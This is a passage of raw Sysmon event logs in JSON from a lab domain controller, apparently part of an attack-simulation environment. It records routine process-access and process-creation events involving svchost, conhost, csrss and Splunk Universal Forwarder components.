07:58:40.626","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4227,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:40.626\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:40.626","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4228,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:40.626\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:40.626","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4229,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:40.626\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:40.626","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4230,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:40.626\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:40.626","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4231,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:40.626\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20B0-5F25-0000-0010EE4B0600}\r\nTargetProcessId: 4644\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:40.626","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20B0-5F25-0000-0010EE4B0600}","TargetProcessId":"4644","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4232,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:41.361\r\nProcessGuid: {41C8662E-20B1-5F25-0000-0010B94D0600}\r\nProcessId: 2220\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:41.361","ProcessGuid":"{41C8662E-20B1-5F25-0000-0010B94D0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4233,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:41.360\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-20B1-5F25-0000-0010B94D0600}\r\nTargetProcessId: 2220\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:41.360","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-20B1-5F25-0000-0010B94D0600}","TargetProcessId":"2220","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4234,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:41.360\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20B1-5F25-0000-0010B94D0600}\r\nTargetProcessId: 2220\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:41.360","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20B1-5F25-0000-0010B94D0600}","TargetProcessId":"2220","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4235,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:41.360\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 